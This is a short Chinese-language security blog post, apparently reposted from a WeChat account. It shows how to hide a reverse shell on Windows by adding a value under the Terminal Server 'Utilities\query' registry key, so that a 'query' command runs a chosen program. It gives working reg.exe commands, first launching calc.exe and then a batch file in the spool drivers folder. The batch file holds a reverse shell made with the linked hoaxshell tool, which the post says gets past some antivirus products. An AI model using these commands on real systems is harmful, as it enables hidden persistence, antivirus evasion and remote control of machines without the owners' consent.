From:https://www.youtube.com/watch?v=gzv3d7rvjKA
注冊表路徑:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery
包含了與終端服務(wù)器相關(guān)的設(shè)置和配置信息。
執(zhí)行命令query可以查看服務(wù)器的一些狀態(tài),實際上是執(zhí)行此項值中的可執(zhí)行文件。
添加一條,打開計算器。
reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01hereseccalc.exe
這里再介紹一個能夠繞過一些AV的Windows反向shell生成器和交互程序。(測試環(huán)境用的X絨,可以繞過,經(jīng)測試不能繞過Windows Defender的AMSI)。
https://github.com/t3l3machus/hoaxshell
將命令寫入一個bat腳本中,然后添加注冊表后執(zhí)行。
reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.bat query heresec
只需執(zhí)行命令query heresec即可運行反彈shell腳本。
還能怎么用,再聯(lián)想一下。
-
服務(wù)器
+關(guān)注
關(guān)注
12文章
9338瀏覽量
86159 -
Shell
+關(guān)注
關(guān)注
1文章
366瀏覽量
23478
原文標(biāo)題:小技巧 | 用一條命令來隱藏反向Shell
文章出處:【微信號:菜鳥學(xué)信安,微信公眾號:菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
發(fā)布評論請先 登錄
相關(guān)推薦
基于Go語言的反彈Shell命令生成工具簡介
![基于Go語言的反彈<b class='flag-5'>Shell</b><b class='flag-5'>命令</b>生成工具簡介](https://file1.elecfans.com/web2/M00/9E/61/wKgaomToCD-APE30AAAcvu7s2fI593.png)
Linux Shell系列教程之Shell簡介和類型
linux shell命令/unix shell命令教程
![linux <b class='flag-5'>shell</b><b class='flag-5'>命令</b>/unix <b class='flag-5'>shell</b><b class='flag-5'>命令</b>教程](https://file.elecfans.com/web2/M00/48/8A/pYYBAGKhtAyACPhpAABPbzxvkQo242.jpg)
Shell內(nèi)建命令:exit命令
Shell命令編程實踐指南
![<b class='flag-5'>Shell</b><b class='flag-5'>命令</b>編程實踐指南](https://file.elecfans.com/web2/M00/63/6C/pYYBAGL_GTaAaPVWAABMkou12p4971.png)
評論